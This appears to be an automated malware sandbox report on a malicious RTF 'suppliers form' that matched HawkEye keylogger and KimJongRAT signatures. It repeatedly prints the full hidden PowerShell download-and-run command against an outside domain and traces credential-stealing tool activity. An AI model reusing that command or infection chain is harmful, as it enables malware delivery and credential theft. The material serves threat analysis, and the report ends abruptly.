Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 33.2.RegAsm.exe.5290000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 30.2.RegAsm.exe.29c0000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 33.2.RegAsm.exe.5290000.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 30.2.RegAsm.exe.29c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@72/69@1/1
Contains functionality for error loggingShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,35_2_004183B8
Contains functionality to check free disk spaceShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,35_2_00418842
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,35_2_00413C19
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_004149B0 FindResourceW,SizeofResource,LoadResource,LockResource,35_2_004149B0
Creates files inside the user directoryShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4424:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3028:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\861296b8-226e-4edf-8430-d2f87707d524
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_01
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{2952C70C-B91E-446C-B117-D1E2D328245C} - OProcSessId.datJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Queries a list of all open handlesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Reads ini filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeFile read: C:\Windows\System32\drivers\etc\hosts
SQL strings found in memory and binary dataShow sources
Source: vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: excel.exe.db.session-journal.5.drBinary or memory string: CREATE TABLE `properties` (`key` TEXT,`value` TEXT)i5;
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2317149038.00000000099D0000.00000004.00000001.sdmp, vbc.exe, 00000023.00000002.1984212977.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000024.00000002.2010056735.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Sample is known by AntivirusShow sources
Source: Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtfVirustotal: Detection: 17%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe 'C:\Program Files (x86)\Microsoft Office\Root\Office16\excelcnv.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe 'C:\Program Files (x86)\Microsoft Office\Root\Office16\excelcnv.exe' -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe 'C:\Program Files (x86)\Microsoft Office\Root\Office16\excelcnv.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe 'C:\Program Files (x86)\Microsoft Office\Root\Office16\excelcnv.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe 'C:\Program Files (x86)\Microsoft Office\Root\Office16\excelcnv.exe' -Embedding
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' -Embedding
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11F2.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp20E6.tmp'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe' Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qCXSc.Exe 'C:\Users\user\AppData\Local\Temp\qCXSc.Exe'
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeProcess created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11F2.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp20E6.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2317149038.00000000099D0000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000001E.00000002.2311891625.00000000059D0000.00000002.00000001.sdmp, RegAsm.exe, 00000021.00000002.2316902999.0000000005F50000.00000002.00000001.sdmp

Data Obfuscation:

barindex
